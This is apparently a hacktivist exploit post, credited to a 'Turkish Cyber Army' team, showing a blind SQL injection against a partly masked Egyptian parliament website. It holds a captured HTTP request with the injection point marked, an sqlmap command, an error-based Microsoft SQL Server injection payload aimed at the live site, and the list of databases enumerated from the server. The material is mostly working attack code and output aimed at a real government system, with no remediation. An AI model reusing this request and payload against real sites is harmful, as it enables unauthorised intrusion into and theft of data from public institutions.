# Exploit Title : Egyptian Parliament Blind SQL
# Team : Sanal Türk Ordusu "Turkish Cyber Army"
# Date : 20/03/2020
# Tested On : Kali Linux
# Contact : instagram.com/rootayyildiz/
# My Youtube Channel : youtube.com/channel/UCjUVMvbk5JGNjrM9rMan81Q/
POST /qualitativecommitteesdetails.aspx?id=349*1*1*1*1*1*1* HTTP/1.1
Content-Length: 8326
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.parl*****nt.gov.eg/
Cookie: ASP.NET_SessionId=h3awgiyku1ct4rbvzcnw1wgu
Host: www.parl*****nt.gov.eg
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ctl00%24Button1=%d8%b9&__EVENTVALIDATION=/wEdAASM0mJ8UD5ls0716QnTIfWRn1RcjtHAj66REed34CUNnqUF4enLXO3emfMk8iBi1qtAqph6VcNpTzh580pS1lO75uIgdLmY6/Eaf/b3Tj4B/xYlSWk09YXiVlPdA1KcoLw=&__VIEWSTATE=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DxUBCNmB2LHYr9mJZAIIDxUBENin2YTYs9in2KjYudipICBkAgoPFQE02KfZhNmF2LXYsdmJINin2YTYr9mK2YXZgtix2KfYt9mJINin2YTYp9is2KrZhdin2LnZiWQCAw9kFgwCAQ8PFgIfBQUmLi4vU2hvd01lbWJlckRldGFpbHNJbWFnZS5hc2h4P2lkPTMwMjNkZAICDxUEGk1lbWJlcnNEZXRhaWxzLmFzcHg/aWQ9MzMxOtis2YXYp9mEINmH2YbYr9mJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAP2LnYttmIINmE2KzZhtipTdis2YXYp9mEINmF2K3ZhdivINin2YTZhdmH2K/ZiSDYudio2K8g2KfZhNix2KTZiNmBINin2K3ZhdivICAgICAgICAgICAgICAgICAgZAIEDxUBQ9io2YbZiiDYs9mI2YrZgSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkAgYPFQEI2YHYsdiv2YlkAggPFQEP2KfZhNiz2KfYr9iz2KkgZAIKDxUBCtmF2LPYqtmC2YRkAgQPZBYMAgEPDxYCHwUFJi4uL1Nob3dNZW1iZXJEZXRhaWxzSW1hZ2UuYXNoeD9pZD0zNTQzZGQCAg8VBBpNZW1iZXJzRGV0YWlscy5hc3B4P2lkPTM5OT3YrNin2KjYsSDYp9mE2LfZiNmK2YLZiSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgD9i52LbZiCDZhNis2YbYqUbYrNin2KjYsSDYp9it2YXYryDZhdit2YXYryDYudio2K8g2KfZhNi52KfZhCAgICAgICAgICAgICAgICAgICAgICAgICAgZAIEDxUBQdiz2YjZh9in2KwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZAIGDxUBCNmB2LHYr9mJZAIIDxUBGdin2YTYq9in2YbZitipINi52LTYsdipICBkAgoPFQET2YXYs9iq2YLYqNmEINmI2LfZhmQCBQ9kFgwCAQ8PFgIfBQUlLi4vU2hvd01lbWJlckRldGFpbHNJbWFnZS5hc2h4P2lkPTQwOWRkAgIPFQQaTWVtYmVyc0RldGFpbHMuYXNweD9pZD0zMjI6KCDYudi12KfZhSDYrtmE2KfZgSApICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA/Yudi22Ygg2YTYrNmG2KlK2LnYtdin2YUg2LnYqNivINin2YTYudiy2YrYsiDYudmE2Ykg2KfYrdmF2K8g2K7ZhNin2YEgICAgICAgICAgICAgICAgICAgICBkAgQPFQFD2KjZhtmKINiz2YjZitmBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGQCBg8VAQjZgdix2K/ZiWQCCA8VAQ/Yp9mE2KvYp9mG2YrYqSBkAgoPFQEK2YXYs9iq2YLZhGQCBg9kFgwCAQ8PFgIfBQUmLi4vU2hvd01lbWJlckRldGFpbHNJbWFnZS5hc2h4P2lkPTQyMTFkZAICDxUEGk1lbWJlcnNEZXRhaWxzLmFzcHg/aWQ9MzgzO9iy2YPYsdmK2Kcg2K3Ys9in2YYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgD9i52LbZiCDZhNis2YbYqUTYstmD2LHZitinINmF2K3ZhdivINin2YTYs9mK2K8g2K3Ys9in2YYgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGQCBA8VAUHYs9mI2YfYp9isICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGQCBg8VAQjZgdix2K/ZiWQCCA8VARDYp9mE2KvYp9mE2KvYqSAgZAIKDxUBCtmF2LPYqtmC2YRkAgcPZBYMAgEPDxYCHwUFJi4uL1Nob3dNZW1iZXJEZXRhaWxzSW1hZ2UuYXNoeD9pZD00NTMzZGQCAg8VBBpNZW1iZXJzRGV0YWlscy5hc3B4P2lkPTE1MxPYqNiz2KfZhSDZgdmE2YrZgdmED9i52LbZiCDZhNis2YbYqTbYqNiz2KfZhSDZhdmG2LXZiNixINin2YTZitmF2KfZhtmJINmF2K3ZhdivINmB2YTZitmB2YRkAgQPFQFE2KfZhNiv2YLZh9mE2YrYqSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkAgYPFQEI2YHYsdiv2YlkAggPFQEQ2KfZhNix2KfYqNi52KkgIGQCCg8VAQrZhdiz2KrZgtmEZAIID2QWDAIBDw8WAh8FBSYuLi9TaG93TWVtYmVyRGV0YWlsc0ltYWdlLmFzaHg/aWQ9NDAyNGRkAgIPFQQaTWVtYmVyc0RldGFpbHMuYXNweD9pZD0xODRE2YXYrdmF2K8g2LnYqNivINin2YTZhdmG2LnZhSDYudio2YrYr9mJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAP2LnYttmIINmE2KzZhtipR9mF2K3ZhdivINmB2YrYtdmEINmF2K3ZhdivINit2LPZitmGINi52KjZitiv2YkgICAgICAgICAgICAgICAgICAgICAgICAgZAIEDxUBRNmD2YHYsSDYp9mE2LTZitiuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZAIGDxUBCNmB2LHYr9mJZAIIDxUBENin2YTYq9in2YTYq9ipICBkAgoPFQEK2KfZhNmG2YjYsWQCCQ9kFgwCAQ8PFgIfBQUmLi4vU2hvd01lbWJlckRldGFpbHNJbWFnZS5hc2h4P2lkPTQzMjVkZAICDxUEGk1lbWJlcnNEZXRhaWxzLmFzcHg/aWQ9MzQwSNin2YTYr9mD2KrZiNixINiz2YXZitixINix2LTYp9ivINin2KjZiCDYt9in2YTYqCAgICAgICAgICAgICAgICAgICAgICAgIA/Yudi22Ygg2YTYrNmG2KlI2LPZhdmK2LEg2LHYtNin2K8g2KfYrdmF2K8g2LnZitivINin2KjZiCDYt9in2YTYqCAgICAgICAgICAgICAgICAgICAgICAgZAIEDxUBQtin2YTZhdmG2YrYpyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGQCBg8VAQjZgdix2K/ZiWQCCA8VARDYp9mE2KvYp9mE2KvYqSAgZAIKDxUBCtmF2LPYqtmC2YRkAgoPZBYMAgEPDxYCHwUFJi4uL1Nob3dNZW1iZXJEZXRhaWxzSW1hZ2UuYXNoeD9pZD0zNjU2ZGQCAg8VBBpNZW1iZXJzRGV0YWlscy5hc3B4P2lkPTM2Mj/Zhdit2YXYryAg2LnYqNiv2KfZhNis2YjYp9ivICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAP2LnYttmIINmE2KzZhtipSNmF2K3ZhdivINin2YTYqNin2LTYpyDYudmK2K8g2KfYrdmF2K8g2YXYrdmF2YjYryAgICAgICAgICAgICAgICAgICAgICAgIGQCBA8VAUHYo9iz2YrZiNi3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGQCBg8VAQjZgdix2K/ZiWQCCA8VARDYp9mE2KvYp9mE2KvYqSAgZAIKDxUBCtmF2LPYqtmC2YRkAgsPZBYMAgEPDxYCHwUFJi4uL1Nob3dNZW1iZXJEZXRhaWxzSW1hZ2UuYXNoeD9pZD00NDQ5ZGQCAg8VBBlNZW1iZXJzRGV0YWlscy5hc3B4P2lkPTI3Htin2K3ZhdivINi52YTZiSDYp9io2LHYp9mH2YrZhQ/Yudi22Ygg2YTYrNmG2Kkp2KfYrdmF2K8g2LnZhNmJINin2KjYsdin2YfZitmFINmF2K3ZhdmI2K9kAgQPFQFD2KfZhNmC2KfZh9ix2KkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGQCBg8VAQjZgdix2K/ZiWQCCA8VARnYp9mE2KvYp9mG2YrYqSDYudi02LHYqSAgZAIKDxUBH9in2YTZhdi12LHZitmK2YYg2KfZhNin2K3Ysdin2LFkZCMqAxP9O2y2Vjl2nih%2bT1rjC1m4VQf3rqR2XNwHgL60&__VIEWSTATEGENERATOR=3B767541
sqlmap -r 1.txt --dbs --batch
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
Payload: http://www.parl*****nt.gov.eg:80/qualitativecommitteesdetails.aspx?id=-3506 OR 2208 IN (SELECT (CHAR(113)+CHAR(98)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2208=2208) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(98)+CHAR(113)))-- CiNo111111
available databases [13]:
[*] E-MINUTES_OPR
[*] master
[*] MEM_OPR
[*] MEMBERS_OPERATOR
[*] MEMDA_OPR
[*] model
[*] msdb
[*] PARLDB
[*] ReportServer$SQL_2008
[*] ReportServer$SQL_2008TempDB
[*] SGOES_OPR
[*] SPEAKER_AGENDA
[*] tempdb
